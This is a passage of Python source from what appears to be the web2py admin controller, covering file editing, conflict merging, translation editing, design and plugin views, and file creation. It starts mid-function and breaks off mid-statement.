    preferences = {'theme': 'web2py', 'editor': 'default', 'closetag': 'true', 'codefolding': 'false', 'tabwidth': '4', 'indentwithtabs': 'false', 'linenumbers': 'true', 'highlightline': 'true'}
    config = Config(os.path.join(request.folder, 'settings.cfg'),
                    section='editor', default_values={})
    preferences.update(config.read())
    if not(request.ajax) and not(is_mobile):
        # return the scaffolding, the rest will be through ajax requests
        response.title = T('Editing %s') % app
        return response.render('default/edit.html', dict(app=app, editor_settings=preferences))
    # show settings tab and save prefernces
    if 'settings' in request.vars:
        if request.post_vars:  # save new preferences
            if PY2:
                post_vars = request.post_vars.items()
            else:
                post_vars = list(request.post_vars.items())
            # Since unchecked checkbox are not serialized, we must set them as false by hand to store the correct preference in the settings
            post_vars += [(opt, 'false') for opt in preferences if opt not in request.post_vars]
            if config.save(post_vars):
                response.headers["web2py-component-flash"] = T('Preferences saved correctly')
            else:
                response.headers["web2py-component-flash"] = T('Preferences saved on session only')
            response.headers["web2py-component-command"] = "update_editor(%s);$('a[href=#editor_settings] button.close').click();" % response.json(config.read())
            return
        else:
            details = {'realfilename': 'settings', 'filename': 'settings', 'id': 'editor_settings', 'force': False}
            details['plain_html'] = response.render('default/editor_settings.html', {'editor_settings': preferences})
            return response.json(details)
    """ File edit handler """
    # Load json only if it is ajax edited...
    app = get_app(request.vars.app)
    filename = '/'.join(request.args)
    realfilename = request.args[-1]
    if request.vars.app:
        path = abspath(filename)
    else:
        path = apath(filename, r=request)
    # Try to discover the file type
    if filename[-3:] == '.py':
        filetype = 'python'
    elif filename[-5:] == '.html':
        filetype = 'html'
    elif filename[-5:] == '.load':
        filetype = 'html'
    elif filename[-4:] == '.css':
        filetype = 'css'
    elif filename[-3:] == '.js':
        filetype = 'javascript'
    else:
        filetype = 'html'
    # ## check if file is not there
    if ('revert' in request.vars) and os.path.exists(path + '.bak'):
        # restore the .bak copy, saving the current content as the new .bak
        try:
            data = safe_read(path + '.bak')
            data1 = safe_read(path)
        except IOError:
            session.flash = T('Invalid action')
            if 'from_ajax' in request.vars:
                return response.json({'error': str(T('Invalid action'))})
            else:
                redirect(URL('site'))
        safe_write(path, data)
        file_hash = md5_hash(data)
        saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
        safe_write(path + '.bak', data1)
        response.flash = T('file "%s" of %s restored', (filename, saved_on))
    else:
        try:
            data = safe_read(path)
        except IOError:
            session.flash = T('Invalid action')
            if 'from_ajax' in request.vars:
                return response.json({'error': str(T('Invalid action'))})
            else:
                redirect(URL('site'))
        lineno_old = count_lines(data)
        file_hash = md5_hash(data)
        saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
        # conflict detection: the file changed on disk since it was loaded
        if request.vars.file_hash and request.vars.file_hash != file_hash:
            session.flash = T('file changed on disk')
            data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
            safe_write(path + '.1', data)
            if 'from_ajax' in request.vars:
                return response.json({'error': str(T('file changed on disk')),
                                      'redirect': URL('resolve',
                                                      args=request.args)})
            else:
                redirect(URL('resolve', args=request.args))
        elif request.vars.data:
            safe_write(path + '.bak', data)
            data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
            safe_write(path, data)
            lineno_new = count_lines(data)
            log_progress(
                app, 'EDIT', filename, progress=lineno_new - lineno_old)
            file_hash = md5_hash(data)
            saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
            response.flash = T('file saved on %s', saved_on)
    data_or_revert = (request.vars.data or request.vars.revert)
    # Check compile errors
    highlight = None
    if filetype == 'python' and request.vars.data:
        import _ast
        try:
            code = request.vars.data.rstrip().replace('\r\n', '\n') + '\n'
            compile(code, path, "exec", _ast.PyCF_ONLY_AST)
        except Exception as e:
            # offset calculation is only used for textarea (start/stop)
            start = sum([len(line) + 1 for l, line
                         in enumerate(request.vars.data.split("\n"))
                         if l < e.lineno - 1])
            if e.text and e.offset:
                offset = e.offset - (len(e.text) - len(
                    e.text.splitlines()[-1]))
            else:
                offset = 0
            highlight = {'start': start, 'end': start +
                         offset + 1, 'lineno': e.lineno, 'offset': offset}
            try:
                ex_name = e.__class__.__name__
            except:
                ex_name = 'unknown exception!'
            response.flash = DIV(T('failed to compile file because:'), BR(),
                                 B(ex_name), ' ' + T('at line %s', e.lineno),
                                 offset and ' ' +
                                 T('at char %s', offset) or '',
                                 PRE(repr(e)))
    if data_or_revert and request.args[1] == 'modules':
        # Lets try to reload the modules
        try:
            mopath = '.'.join(request.args[2:])[:-3]
            exec('import applications.%s.modules.%s' % (
                request.args[0], mopath))
            reload(sys.modules['applications.%s.modules.%s'
                               % (request.args[0], mopath)])
        except Exception as e:
            response.flash = DIV(
                T('failed to reload module because:'), PRE(repr(e)))
    edit_controller = None
    editviewlinks = None
    view_link = None
    if filetype == 'html' and len(request.args) >= 3:
        # editing a view: link back to its controller and rendered page
        cfilename = os.path.join(request.args[0], 'controllers',
                                 request.args[2] + '.py')
        if os.path.exists(apath(cfilename, r=request)):
            edit_controller = URL('edit', args=[cfilename.replace(os.sep, "/")])
            view = request.args[3].replace('.html', '')
            view_link = URL(request.args[0], request.args[2], view)
    elif filetype == 'python' and request.args[1] == 'controllers':
        # it's a controller file.
        # Create links to all of the associated view files.
        app = get_app()
        viewname = os.path.splitext(request.args[2])[0]
        viewpath = os.path.join(app, 'views', viewname)
        aviewpath = apath(viewpath, r=request)
        viewlist = []
        if os.path.exists(aviewpath):
            if os.path.isdir(aviewpath):
                viewlist = glob(os.path.join(aviewpath, '*.html'))
            elif os.path.exists(aviewpath + '.html'):
                viewlist.append(aviewpath + '.html')
        if len(viewlist):
            editviewlinks = []
            for v in sorted(viewlist):
                vf = os.path.split(v)[-1]
                vargs = "/".join([viewpath.replace(os.sep, "/"), vf])
                editviewlinks.append(A(vf.split(".")[0],
                                       _class="editor_filelink",
                                       _href=URL('edit', args=[vargs])))
    if len(request.args) > 2 and request.args[1] == 'controllers':
        controller = (request.args[2])[:-3]
        try:
            functions = find_exposed_functions(data)
            functions = functions and sorted(functions) or []
        except SyntaxError as err:
            functions = ['SyntaxError:Line:%d' % err.lineno]
    else:
        (controller, functions) = (None, None)
    if 'from_ajax' in request.vars:
        return response.json({'file_hash': file_hash, 'saved_on': saved_on, 'functions': functions, 'controller': controller, 'application': request.args[0], 'highlight': highlight})
    else:
        file_details = dict(app=request.args[0],
                            lineno=request.vars.lineno or 1,
                            editor_settings=preferences,
                            filename=filename,
                            realfilename=realfilename,
                            filetype=filetype,
                            data=data,
                            edit_controller=edit_controller,
                            file_hash=file_hash,
                            saved_on=saved_on,
                            controller=controller,
                            functions=functions,
                            view_link=view_link,
                            editviewlinks=editviewlinks,
                            id=IS_SLUG()(filename)[0],
                            force=True if (request.vars.restore or
                                           request.vars.revert) else False)
        plain_html = response.render('default/edit_js.html', file_details)
        file_details['plain_html'] = plain_html
        if is_mobile:
            return response.render('default.mobile/edit.html',
                                   file_details, editor_settings=preferences)
        else:
            return response.json(file_details)
def todolist():
    """ Returns all TODO of the requested app, grouped by directory,
    with the text and line number of each match.
    """
    app = request.vars.app or ''
    app_path = apath('%(app)s' % {'app': app}, r=request)
    dirs = ['models', 'controllers', 'modules', 'private']
    def listfiles(app, dir, regexp='.*\.py$'):
        # list matching files in app/dir, skipping .bak backups
        files = sorted(listdir(apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request), regexp))
        files = [x.replace(os.path.sep, '/') for x in files if not x.endswith('.bak')]
        return files
    pattern = '#\s*(todo)+\s+(.*)'
    regex = re.compile(pattern, re.IGNORECASE)
    output = []
    for d in dirs:
        for f in listfiles(app, d):
            matches = []
            filename = apath(os.path.join(app, d, f), r=request)
            with safe_open(filename, 'r') as f_s:
                src = f_s.read()
            for m in regex.finditer(src):
                start = m.start()
                # line number = newlines before the match, 1-based
                lineno = src.count('\n', 0, start) + 1
                matches.append({'text': m.group(0), 'lineno': lineno})
            if len(matches) != 0:
                output.append({'filename': f, 'matches': matches, 'dir': d})
    return {'todo': output, 'app': app}
def editor_sessions():
    """Save and render named editor file-sessions stored in settings.cfg."""
    config = Config(os.path.join(request.folder, 'settings.cfg'),
                    section='editor_sessions', default_values={})
    preferences = config.read()
    if request.vars.session_name and request.vars.files:
        # persist the list of files under the given session name
        session_name = request.vars.session_name
        files = request.vars.files
        preferences.update({session_name: ','.join(files)})
        if config.save(preferences.items()):
            response.headers["web2py-component-flash"] = T('Session saved correctly')
        else:
            response.headers["web2py-component-flash"] = T('Session saved on session only')
    return response.render('default/editor_sessions.html', {'editor_sessions': preferences})
def resolve():
    """Merge a file with its conflicting '.1' copy produced by edit().

    GET renders an ndiff table with checkboxes; POST writes back the
    lines the user kept.
    """
    filename = '/'.join(request.args)
    # ## check if file is not there
    path = apath(filename, r=request)
    a = safe_read(path).split('\n')
    try:
        b = safe_read(path + '.1').split('\n')
    except IOError:
        session.flash = 'Other file, no longer there'
        redirect(URL('edit', args=request.args))
    d = difflib.ndiff(a, b)
    def leading(line):
        """ Render a diff line's leading whitespace as HTML nbsp entities """
        # TODO: we really need to comment this
        z = ''
        for (k, c) in enumerate(line):
            if c == ' ':
                z += ' '
            elif c == ' \t':
                z += ' '
            elif k == 0 and c == '?':
                pass
            else:
                break
        return XML(z)
    def getclass(item):
        """ Determine item class from the ndiff marker character """
        operators = {' ': 'normal', '+': 'plus', '-': 'minus'}
        return operators[item[0]]
    if request.vars:
        # keep unchanged lines plus every checked line
        c = '\n'.join([item[2:].rstrip() for (i, item) in enumerate(d) if item[0]
                       == ' ' or 'line%i' % i in request.vars])
        safe_write(path, c)
        session.flash = 'files merged'
        redirect(URL('edit', args=request.args))
    else:
        # Making the short circuit compatible with <= python2.4
        gen_data = lambda index, item: not item[:1] in ['+', '-'] and "" \
            or INPUT(_type='checkbox',
                     _name='line%i' % index,
                     value=item[0] == '+')
        diff = TABLE(*[TR(TD(gen_data(i, item)),
                          TD(item[0]),
                          TD(leading(item[2:]),
                             TT(item[2:].rstrip())),
                          _class=getclass(item))
                       for (i, item) in enumerate(d) if item[0] != '?'])
    return dict(diff=diff, filename=filename)
def edit_language():
    """ Edit language file: render one input per translation string and
    write the updated dictionary back on submit. """
    app = get_app()
    filename = '/'.join(request.args)
    response.title = request.args[-1]
    strings = read_dict(apath(filename, r=request))
    if '__corrupted__' in strings:
        form = SPAN(strings['__corrupted__'], _class='error')
        return dict(filename=filename, form=form)
    keys = sorted(strings.keys(), key=lambda x: to_native(x).lower())
    rows = []
    rows.append(H2(T('Original/Translation')))
    for key in keys:
        name = md5_hash(key)
        s = strings[key]
        # keys may carry a '<prefix>\x01<text>' context tag
        (prefix, sep, key) = key.partition('\x01')
        if sep:
            prefix = SPAN(prefix + ': ', _class='tm_ftag')
            k = key
        else:
            (k, prefix) = (prefix, '')
        _class = 'untranslated' if k == s else 'translated'
        # short strings get an input, long ones a textarea
        if len(s) <= 40:
            elem = INPUT(_type='text', _name=name, value=s,
                         _size=70, _class=_class)
        else:
            elem = TEXTAREA(_name=name, value=s, _cols=70,
                            _rows=5, _class=_class)
        # Making the short circuit compatible with <= python2.4
        k = (s != k) and k or B(k)
        new_row = DIV(LABEL(prefix, k, _style="font-weight:normal;"),
                      CAT(elem, '\n', TAG.BUTTON(
                          T('delete'),
                          _onclick='return delkey("%s")' % name,
                          _class='btn')), _id=name, _class='span6 well well-small')
        rows.append(DIV(new_row, _class="row-fluid"))
    rows.append(DIV(INPUT(_type='submit', _value=T('update'), _class="btn btn-primary"), _class='controls'))
    form = FORM(*rows)
    if form.accepts(request.vars, keepvalues=True):
        strs = dict()
        for key in keys:
            name = md5_hash(key)
            # chr(127) marks entries deleted in the UI
            if form.vars[name] == chr(127):
                continue
            strs[key] = form.vars[name]
        write_dict(apath(filename, r=request), strs)
        session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
        redirect(URL(r=request, args=request.args))
    return dict(app=request.args[0], filename=filename, form=form)
def edit_plurals():
    """ Edit plurals file: one row per word with inputs for each plural form.

    Bug fixed: the original sorted keys with a Python 2 cmp-style lambda
    using the removed `cmp` builtin and the undefined `unicode` name,
    which raises TypeError/NameError on Python 3. Keys are now sorted
    with a key function, consistent with edit_language().
    """
    app = get_app()
    filename = '/'.join(request.args)
    plurals = read_plural_dict(
        apath(filename, r=request))  # plural forms dictionary
    nplurals = int(request.vars.nplurals) - 1  # plural forms quantity
    xnplurals = xrange(nplurals)
    if '__corrupted__' in plurals:
        # show error message and exit
        form = SPAN(plurals['__corrupted__'], _class='error')
        return dict(filename=filename, form=form)
    keys = sorted(plurals.keys(), key=lambda x: to_native(x).lower())
    tab_rows = []
    for key in keys:
        name = md5_hash(key)
        forms = plurals[key]
        if len(forms) < nplurals:
            # pad missing plural forms with None so every row has nplurals inputs
            forms.extend(None for i in xrange(nplurals - len(forms)))
        tab_col1 = DIV(CAT(LABEL(T("Singular Form")), B(key,
                                                        _class='fake-input')))
        tab_inputs = [SPAN(LABEL(T("Plural Form #%s", n + 1)), INPUT(_type='text', _name=name + '_' + str(n), value=forms[n], _size=20), _class='span6') for n in xnplurals]
        tab_col2 = DIV(CAT(*tab_inputs))
        tab_col3 = DIV(CAT(LABEL(XML('&nbsp;')), TAG.BUTTON(T('delete'), _onclick='return delkey("%s")' % name, _class='btn'), _class='span6'))
        tab_row = DIV(DIV(tab_col1, '\n', tab_col2, '\n', tab_col3, _class='well well-small'), _id=name, _class='row-fluid tab_row')
        tab_rows.append(tab_row)
    tab_rows.append(DIV(TAG['button'](T('update'), _type='submit',
                                      _class='btn btn-primary'),
                        _class='controls'))
    tab_container = DIV(*tab_rows, **dict(_class="row-fluid"))
    form = FORM(tab_container)
    if form.accepts(request.vars, keepvalues=True):
        new_plurals = dict()
        for key in keys:
            name = md5_hash(key)
            # chr(127) marks entries deleted in the UI
            if form.vars[name + '_0'] == chr(127):
                continue
            new_plurals[key] = [form.vars[name + '_' + str(n)]
                                for n in xnplurals]
        write_plural_dict(apath(filename, r=request), new_plurals)
        session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
        redirect(URL(r=request, args=request.args, vars=dict(
            nplurals=request.vars.nplurals)))
    return dict(app=request.args[0], filename=filename, form=form)
def about():
    """ Read about info: render the app's ABOUT and LICENSE files. """
    app = get_app()
    # ## check if file is not there
    about = safe_read(apath('%s/ABOUT' % app, r=request))
    license = safe_read(apath('%s/LICENSE' % app, r=request))
    return dict(app=app, about=MARKMIN(about), license=MARKMIN(license), progress=report_progress(app))
def design():
    """Application design handler.

    Builds the data for the "design" page of one application: models (with
    the tables they define), controllers (with exposed functions), views
    (with extend/include relations), modules, private and static files,
    languages and crontab.  Also accepts a plugin pack upload via
    ``request.vars.pluginfile``.  Plugin-owned files are split out of every
    listing by the nested ``filter_plugins`` helper.

    Fix vs. previous revision: removed the redundant double assignment
    ``modules = modules = [...]`` (dead code, no behavior change).
    """
    app = get_app()
    if not response.flash and app == request.application:
        msg = T('ATTENTION: you cannot edit the running application!')
        response.flash = msg
    # CSRF guard: state-changing requests must echo the session token
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    if request.vars.pluginfile is not None and not isinstance(request.vars.pluginfile, str):
        filename = os.path.basename(request.vars.pluginfile.filename)
        if plugin_install(app, request.vars.pluginfile.file,
                          request, filename):
            session.flash = T('new plugin installed')
            redirect(URL('design', args=app))
        else:
            session.flash = \
                T('unable to install plugin "%s"', filename)
            redirect(URL(r=request, args=app))
    elif isinstance(request.vars.pluginfile, str):
        session.flash = T('plugin not specified')
        redirect(URL(r=request, args=app))
    # If we have only pyc files it means that
    # we cannot design
    if os.path.exists(apath('%s/compiled' % app, r=request)):
        session.flash = \
            T('application is compiled and cannot be designed')
        redirect(URL('site'))
    # Get all models
    models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
    models = [x.replace('\\', '/') for x in models]
    defines = {}
    for m in models:
        data = safe_read(apath('%s/models/%s' % (app, m), r=request))
        defines[m] = re.findall(REGEX_DEFINE_TABLE, data, re.MULTILINE)
        defines[m].sort()
    # Get all controllers
    controllers = sorted(
        listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
    controllers = [x.replace('\\', '/') for x in controllers]
    functions = {}
    for c in controllers:
        data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
        try:
            items = find_exposed_functions(data)
            functions[c] = items and sorted(items) or []
        except SyntaxError as err:
            # still list the controller, but flag the broken line
            functions[c] = ['SyntaxError:Line:%d' % err.lineno]
    # Get all views
    views = sorted(
        listdir(apath('%s/views/' % app, r=request), '[\w/\-]+(\.\w+)+$'))
    views = [x.replace('\\', '/') for x in views if not x.endswith('.bak')]
    extend = {}
    include = {}
    for c in views:
        data = safe_read(apath('%s/views/%s' % (app, c), r=request))
        items = re.findall(REGEX_EXTEND, data, re.MULTILINE)
        if items:
            extend[c] = items[0][1]
        items = re.findall(REGEX_INCLUDE, data)
        include[c] = [i[1] for i in items]
    # Get all modules
    modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
    modules = [x.replace('\\', '/') for x in modules]
    modules.sort()
    # Get all private files
    privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
    privates = [x.replace('\\', '/') for x in privates]
    privates.sort()
    # Get all static files
    statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
                      maxnum=MAXNFILES)
    statics = [x.replace(os.path.sep, '/') for x in statics]
    statics.sort()
    # Get all languages
    langpath = os.path.join(apath(app, r=request), 'languages')
    languages = dict([(lang, info) for lang, info
                      in iteritems(read_possible_languages(langpath))
                      if info[2] != 0])  # info[2] is langfile_mtime:
    # get only existed files
    # Get crontab
    cronfolder = apath('%s/cron' % app, r=request)
    crontab = apath('%s/cron/crontab' % app, r=request)
    if not is_gae:
        if not os.path.exists(cronfolder):
            os.mkdir(cronfolder)
        if not os.path.exists(crontab):
            safe_write(crontab, '#crontab')
    plugins = []

    def filter_plugins(items, plugins):
        # collect plugin names (accumulated into the shared `plugins` list)
        # and return only the non-plugin items
        plugins += [item[7:].split('/')[0].split(
            '.')[0] for item in items if item.startswith('plugin_')]
        plugins[:] = list(set(plugins))
        plugins.sort()
        return [item for item in items if not item.startswith('plugin_')]

    return dict(app=app,
                models=filter_plugins(models, plugins),
                defines=defines,
                controllers=filter_plugins(controllers, plugins),
                functions=functions,
                views=filter_plugins(views, plugins),
                modules=filter_plugins(modules, plugins),
                extend=extend,
                include=include,
                privates=filter_plugins(privates, plugins),
                statics=filter_plugins(statics, plugins),
                languages=languages,
                crontab=crontab,
                plugins=plugins)
def delete_plugin():
    """Delete every file/folder of a plugin from an application.

    Expects ``request.args(0)`` = app name and ``request.args(1)`` = plugin
    name (without the ``plugin_`` prefix).  Shows a confirmation dialog
    first; on acceptance removes all items named ``plugin_<name>.*`` across
    the standard application folders, then redirects back to the design page.
    """
    app = request.args(0)
    plugin = request.args(1)
    plugin_name = 'plugin_' + plugin
    dialog = FORM.confirm(
        T('Delete'),
        {T('Cancel'): URL('design', args=app)})
    if dialog.accepted:
        try:
            for folder in ['models', 'views', 'controllers', 'static', 'modules', 'private']:
                path = os.path.join(apath(app, r=request), folder)
                for item in os.listdir(path):
                    # match "plugin_<name>" regardless of extension
                    if item.rsplit('.', 1)[0] == plugin_name:
                        filename = os.path.join(path, item)
                        if os.path.isdir(filename):
                            shutil.rmtree(filename)
                        else:
                            os.unlink(filename)
            session.flash = T('plugin "%(plugin)s" deleted',
                              dict(plugin=plugin))
        except Exception:
            # best-effort: partial deletion is reported as a failure
            session.flash = T('unable to delete file plugin "%(plugin)s"',
                              dict(plugin=plugin))
        redirect(URL('design', args=request.args(0), anchor=request.vars.id2))
    return dict(dialog=dialog, plugin=plugin)
def plugin():
    """Plugin design handler.

    Same inventory as :func:`design` (models, controllers, views, modules,
    private/static files, languages, crontab), but every listing is filtered
    to the files belonging to the plugin named by ``request.args(1)``.

    Fix vs. previous revision: removed the redundant double assignment
    ``modules = modules = [...]`` (dead code, no behavior change).
    """
    app = get_app()
    plugin = request.args(1)
    if not response.flash and app == request.application:
        msg = T('ATTENTION: you cannot edit the running application!')
        response.flash = msg
    # If we have only pyc files it means that
    # we cannot design
    if os.path.exists(apath('%s/compiled' % app, r=request)):
        session.flash = \
            T('application is compiled and cannot be designed')
        redirect(URL('site'))
    # Get all models
    models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
    models = [x.replace('\\', '/') for x in models]
    defines = {}
    for m in models:
        data = safe_read(apath('%s/models/%s' % (app, m), r=request))
        defines[m] = re.findall(REGEX_DEFINE_TABLE, data, re.MULTILINE)
        defines[m].sort()
    # Get all controllers
    controllers = sorted(
        listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
    controllers = [x.replace('\\', '/') for x in controllers]
    functions = {}
    for c in controllers:
        data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
        try:
            items = find_exposed_functions(data)
            functions[c] = items and sorted(items) or []
        except SyntaxError as err:
            functions[c] = ['SyntaxError:Line:%d' % err.lineno]
    # Get all views
    views = sorted(
        listdir(apath('%s/views/' % app, r=request), '[\w/\-]+\.\w+$'))
    views = [x.replace('\\', '/') for x in views]
    extend = {}
    include = {}
    for c in views:
        data = safe_read(apath('%s/views/%s' % (app, c), r=request))
        items = re.findall(REGEX_EXTEND, data, re.MULTILINE)
        if items:
            extend[c] = items[0][1]
        items = re.findall(REGEX_INCLUDE, data)
        include[c] = [i[1] for i in items]
    # Get all modules
    modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
    modules = [x.replace('\\', '/') for x in modules]
    modules.sort()
    # Get all private files
    privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
    privates = [x.replace('\\', '/') for x in privates]
    privates.sort()
    # Get all static files
    statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
                      maxnum=MAXNFILES)
    statics = [x.replace(os.path.sep, '/') for x in statics]
    statics.sort()
    # Get all languages
    languages = sorted([lang + '.py' for lang, info in
                        iteritems(T.get_possible_languages_info())
                        if info[2] != 0])  # info[2] is langfile_mtime:
    # get only existed files
    # Get crontab
    crontab = apath('%s/cron/crontab' % app, r=request)
    if not os.path.exists(crontab):
        safe_write(crontab, '#crontab')

    def filter_plugins(items):
        # keep only entries that belong to this plugin
        regex = re.compile('^plugin_' + plugin + '(/.*|\..*)?$')
        return [item for item in items if item and regex.match(item)]

    return dict(app=app,
                models=filter_plugins(models),
                defines=defines,
                controllers=filter_plugins(controllers),
                functions=functions,
                views=filter_plugins(views),
                modules=filter_plugins(modules),
                extend=extend,
                include=include,
                privates=filter_plugins(privates),
                statics=filter_plugins(statics),
                languages=languages,
                crontab=crontab)
def create_file():
    """Create a new application file of the appropriate kind.

    The target folder (from ``request.vars.location``) decides which
    template content the new file gets: plural-rules stub, language file,
    model, controller, view, module, or an empty static/private file.
    Redirects on success; note that ``redirect`` raises HTTP, which is why
    the success path also flows through the ``except`` clause below.
    """
    # CSRF guard: state-changing requests must echo the session token
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    try:
        anchor = '#' + request.vars.id if request.vars.id else ''
        if request.vars.app:
            app = get_app(request.vars.app)
            path = abspath(request.vars.location)
        else:
            if request.vars.dir:
                request.vars.location += request.vars.dir + '/'
            app = get_app(name=request.vars.location.split('/')[0])
            path = apath(request.vars.location, r=request)
        # sanitize the requested file name
        filename = re.sub('[^\w./-]+', '_', request.vars.filename)
        if path[-7:] == '/rules/':
            # Handle plural rules files
            if len(filename) == 0:
                raise SyntaxError
            if not filename[-3:] == '.py':
                filename += '.py'
            lang = re.match('^plural_rules-(.*)\.py$', filename).group(1)
            langinfo = read_possible_languages(apath(app, r=request))[lang]
            text = dedent("""
            #!/usr/bin/env python
            # -*- coding: utf-8 -*-
            # Plural-Forms for %(lang)s (%(langname)s)
            nplurals=2 # for example, English language has 2 forms:
            # 1 singular and 1 plural
            # Determine plural_id for number *n* as sequence of positive
            # integers: 0,1,...
            # NOTE! For singular form ALWAYS return plural_id = 0
            get_plural_id = lambda n: int(n != 1)
            # Construct and return plural form of *word* using
            # *plural_id* (which ALWAYS>0). This function will be executed
            # for words (or phrases) not found in plural_dict dictionary.
            # By default this function simply returns word in singular:
            construct_plural_form = lambda word, plural_id: word
            """)[1:] % dict(lang=langinfo[0], langname=langinfo[1])
        elif path[-11:] == '/languages/':
            # Handle language files
            if len(filename) == 0:
                raise SyntaxError
            if not filename[-3:] == '.py':
                filename += '.py'
            path = os.path.join(apath(app, r=request), 'languages', filename)
            if not os.path.exists(path):
                safe_write(path, '')
            # create language xx[-yy].py file:
            findT(apath(app, r=request), filename[:-3])
            session.flash = T('language file "%(filename)s" created/updated',
                              dict(filename=filename))
            redirect(request.vars.sender + anchor)
        elif path[-8:] == '/models/':
            # Handle python models
            if not filename[-3:] == '.py':
                filename += '.py'
            if len(filename) == 3:
                raise SyntaxError
            text = '# -*- coding: utf-8 -*-\n'
        elif path[-13:] == '/controllers/':
            # Handle python controllers
            if not filename[-3:] == '.py':
                filename += '.py'
            if len(filename) == 3:
                raise SyntaxError
            text = '# -*- coding: utf-8 -*-\n# %s\ndef index(): return dict(message="hello from %s")'
            text = text % (T('try something like'), filename)
        elif path[-7:] == '/views/':
            if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
                filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
            # Handle template (html) views
            if filename.find('.') < 0:
                filename += '.html'
            extension = filename.split('.')[-1].lower()
            if len(filename) == 5:
                raise SyntaxError
            msg = T(
                'This is the %(filename)s template', dict(filename=filename))
            if extension == 'html':
                text = dedent("""
                {{extend 'layout.html'}}
                <h1>%s</h1>
                {{=BEAUTIFY(response._vars)}}""" % msg)[1:]
            else:
                # non-HTML views start from the matching generic view, if any
                generic = os.path.join(path, 'generic.' + extension)
                if os.path.exists(generic):
                    text = read_file(generic)
                else:
                    text = ''
        elif path[-9:] == '/modules/':
            if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
                filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
            # Handle python module files
            if not filename[-3:] == '.py':
                filename += '.py'
            if len(filename) == 3:
                raise SyntaxError
            text = dedent("""
            #!/usr/bin/env python
            # -*- coding: utf-8 -*-
            from gluon import *\n""")[1:]
        elif (path[-8:] == '/static/') or (path[-9:] == '/private/'):
            if (request.vars.plugin and
               not filename.startswith('plugin_%s/' % request.vars.plugin)):
                filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
            text = ''
        else:
            redirect(request.vars.sender + anchor)
        full_filename = os.path.join(path, filename)
        dirpath = os.path.dirname(full_filename)
        if not os.path.exists(dirpath):
            os.makedirs(dirpath)
        if os.path.exists(full_filename):
            # refuse to overwrite an existing file
            raise SyntaxError
        safe_write(full_filename, text)
        log_progress(app, 'CREATE', filename)
        if request.vars.dir:
            result = T('file "%(filename)s" created',
                       dict(filename=full_filename[len(path):]))
        else:
            session.flash = T('file "%(filename)s" created',
                              dict(filename=full_filename[len(path):]))
        vars = {}
        if request.vars.id:
            vars['id'] = request.vars.id
        if request.vars.app:
            vars['app'] = request.vars.app
        redirect(URL('edit',
                     args=[os.path.join(request.vars.location, filename)], vars=vars))
    except Exception as e:
        # redirect() raises HTTP, so the success path also lands here
        if not isinstance(e, HTTP):
            session.flash = T('cannot create file')
    # NOTE(review): if a non-HTTP exception fired before `result` was
    # assigned and request.vars.dir is set, the next line raises NameError
    # — looks like a latent bug; confirm before relying on this path.
    if request.vars.dir:
        response.flash = result
        response.headers['web2py-component-content'] = 'append'
        response.headers['web2py-component-command'] = "%s %s %s" % (
            "$.web2py.invalidate('#files_menu');",
            "load_file('%s');" % URL('edit', args=[app, request.vars.dir, filename]),
            "$.web2py.enableElement($('#form form').find($.web2py.formInputClickSelector));")
        return ''
    else:
        redirect(request.vars.sender + anchor)
def listfiles(app, dir, regexp='.*\.py$'):
    """Return the sorted files of ``applications/<app>/<dir>`` matching
    *regexp*, with path separators normalised to ``/`` and ``.bak``
    backups excluded."""
    folder = apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request)
    selected = []
    for entry in sorted(listdir(folder, regexp)):
        if entry.endswith('.bak'):
            continue
        selected.append(entry.replace('\\', '/'))
    return selected
def editfile(path, file, vars=None, app=None):
    """Build a link (gluon ``A`` helper) to the edit page for *file*.

    Args:
        path: folder of the file (e.g. 'controllers').
        file: file name to edit.
        vars: query variables for the URL; when it contains the key 'app'
            the URL args omit the *app* component.  Defaults to an empty
            mapping (was a mutable ``{}`` default — fixed to avoid the
            shared-mutable-default pitfall; behavior is unchanged).
        app: application name, used when 'app' is not in *vars*.
    """
    vars = {} if vars is None else vars
    args = (path, file) if 'app' in vars else (app, path, file)
    url = URL('edit', args=args, vars=vars)
    return A(file, _class='editor_filelink', _href=url, _style='word-wrap: nowrap;')
def files_menu():
    """Build the collapsible per-folder file menu for the edit page.

    For each standard application folder, emits a nav-header LI that
    toggles a hidden UL of edit links (one per file matching the folder's
    regexp, via :func:`editfile`/:func:`listfiles`).
    """
    # fall back to the bundled 'welcome' app when none is given
    app = request.vars.app or 'welcome'
    dirs = [{'name': 'models', 'reg': '.*\.py$'},
            {'name': 'controllers', 'reg': '.*\.py$'},
            {'name': 'views', 'reg': '[\w/\-]+(\.\w+)+$'},
            {'name': 'modules', 'reg': '.*\.py$'},
            {'name': 'static', 'reg': '[^\.#].*'},
            {'name': 'private', 'reg': '.*\.py$'}]
    result_files = []
    for dir in dirs:
        result_files.append(TAG[''](LI(dir['name'], _class="nav-header component", _onclick="collapse('" + dir['name'] + "_files');"),
                                    LI(UL(*[LI(editfile(dir['name'], f, dict(id=dir['name'] + f.replace('.', '__')), app), _style="overflow:hidden", _id=dir['name'] + "__" + f.replace('.', '__'))
